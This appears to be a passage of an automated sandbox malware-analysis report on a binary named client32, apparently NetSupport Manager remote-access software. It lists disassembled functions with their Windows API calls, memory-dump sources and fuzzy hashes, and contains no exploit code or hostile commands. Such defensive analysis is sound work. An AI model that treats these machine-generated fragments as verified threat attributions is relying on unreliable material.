                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                    • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                    • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                                                                    • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                    • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110F0060 Relevance: 13.6, APIs: 9, Instructions: 70memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 110F0067
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,110F0E7E,?,?,20F29797), ref: 110F009F
                                                                                                                                    • ReleaseDC.USER32 ref: 110F00AD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocGlobalRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1459782005-0
                                                                                                                                    • Opcode ID: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                                                                                    • Instruction ID: 895e16ec520d13b6265c6dc70c6115b10cf0d765340dc232e34c0638dbe3d9ef
                                                                                                                                    • Opcode Fuzzy Hash: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                                                                                    • Instruction Fuzzy Hash: BF113172A41228A7D3209B949DC9FDBB7ECEB4C716F000179FD19C3604E6755C0043E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110027F0 Relevance: 13.6, APIs: 9, Instructions: 58COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$EllipseRectangleStock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1843601829-0
                                                                                                                                    • Opcode ID: 620863ee41f93a0768b26bff67ea735739fb6c23b1e0fe3f5cf0f1122ac89c1d
                                                                                                                                    • Instruction ID: 0884fd21b0f38284b9d1e96bc8cb4ffa9d5bf596259f2d3e1ca5875b7c60ef4b
                                                                                                                                    • Opcode Fuzzy Hash: 620863ee41f93a0768b26bff67ea735739fb6c23b1e0fe3f5cf0f1122ac89c1d
                                                                                                                                    • Instruction Fuzzy Hash: 67112A75501118BFD704EF99DD84DAFBBACFF89300F018159F91887244CB70AA018BA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116A5F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,110B827B,00000100,00000000,00000000,7FFFFFFF,00000100,110B827B,?,?,?,111724A4,00000001,00000080,111724A4), ref: 1116A661
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 1116A6CF
                                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 1116A6EB
                                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 1116A724
                                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 1116A78A
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 1116A7A9
                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiStringWide$AllocateHeap
                                                                                                                                    • String ID: pYhv
                                                                                                                                    • API String ID: 1400492145-1028939545
                                                                                                                                    • Opcode ID: 13711739a413f6645d30b46b524980bbd6ef25a88b9077b6e6139941533ea7b5
                                                                                                                                    • Instruction ID: c74e0431096407bdd3813438686288212588769aa0f25bdd36389af6976f4778
                                                                                                                                    • Opcode Fuzzy Hash: 13711739a413f6645d30b46b524980bbd6ef25a88b9077b6e6139941533ea7b5
                                                                                                                                    • Instruction Fuzzy Hash: 6451A27790010AEFDF018F96ED808AEBFBAEB88358B114569F625A6110D7B7DC70DB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116E6AE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,111F2A0A,00000104,00000001,?,00000000), ref: 1116E74A
                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 1116E7FC
                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 1116E848
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                                                    • Opcode ID: a0513764af62b4cd23b56e555778b6e44971d6e9acd2054126c8c5ee93951369
                                                                                                                                    • Instruction ID: 55104509eba4d9f00ff6270572b5613f082a0b27ebf7e49632e93751ea7044cb
                                                                                                                                    • Opcode Fuzzy Hash: a0513764af62b4cd23b56e555778b6e44971d6e9acd2054126c8c5ee93951369
                                                                                                                                    • Instruction Fuzzy Hash: A3415D769426376AEB01D6748E80BFFF6AC9B0631CF110235EC15E3280EA669620C7D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create$CriticalInitializeSectionwsprintf
                                                                                                                                    • String ID: ConfigList$PCICTL
                                                                                                                                    • API String ID: 3512777996-1939909508
                                                                                                                                    • Opcode ID: b77ef6b6f32e8a41c3db4659102eba5f45f1753ad4c42d903d8dd8d1b9601a40
                                                                                                                                    • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                                                                                    • Opcode Fuzzy Hash: b77ef6b6f32e8a41c3db4659102eba5f45f1753ad4c42d903d8dd8d1b9601a40
                                                                                                                                    • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11005210 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetMenuItemCount.USER32 ref: 1100521E
                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                                                                                    • EnableMenuItem.USER32 ref: 110052C7
                                                                                                                                    • GetMenuItemInfoA.USER32 ref: 110052E8
                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$CheckCountEnable
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 4290561058-4108050209
                                                                                                                                    • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                                                    • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                                                                    • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                                                    • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110CE050 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32 ref: 110CE0C5
                                                                                                                                    • GetClientRect.USER32 ref: 110CE0F8
                                                                                                                                    • GetWindowRect.USER32 ref: 110CE103
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$Window$ClientErrorExitLastMessageProcesswsprintf
                                                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$hWnd$m_hWnd
                                                                                                                                    • API String ID: 2908456680-3958695921
                                                                                                                                    • Opcode ID: 424f742d6583b52154406f255ca50d8b991adb550dde116db2914781698bf903
                                                                                                                                    • Instruction ID: 712cfbea46f41dce34da92735377c28625c10b46f47693fc43de73f5d42021ce
                                                                                                                                    • Opcode Fuzzy Hash: 424f742d6583b52154406f255ca50d8b991adb550dde116db2914781698bf903
                                                                                                                                    • Instruction Fuzzy Hash: 4A316275D00219AFDB14CFA8CC81EEEFBB4EF49318F1481A9E9566B244D730A944CFA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11145120 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetMenuItemCount.USER32 ref: 1114513D
                                                                                                                                    • GetMenuItemInfoA.USER32 ref: 1114519B
                                                                                                                                    • CreatePopupMenu.USER32 ref: 111451AA
                                                                                                                                    • GetMenuItemCount.USER32 ref: 111451D3
                                                                                                                                    • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                                                                    • GetMenuItemCount.USER32 ref: 111451EB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$Count$CreateInfoInsertPopup
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 756051400-4108050209
                                                                                                                                    • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                                    • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                                                    • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                                    • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11120080 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(?), ref: 111200AE
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 111200C2
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 111200C9
                                                                                                                                    • SelectPalette.GDI32 ref: 111200EF
                                                                                                                                    • SetStretchBltMode.GDI32(?,00000001), ref: 1112011B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
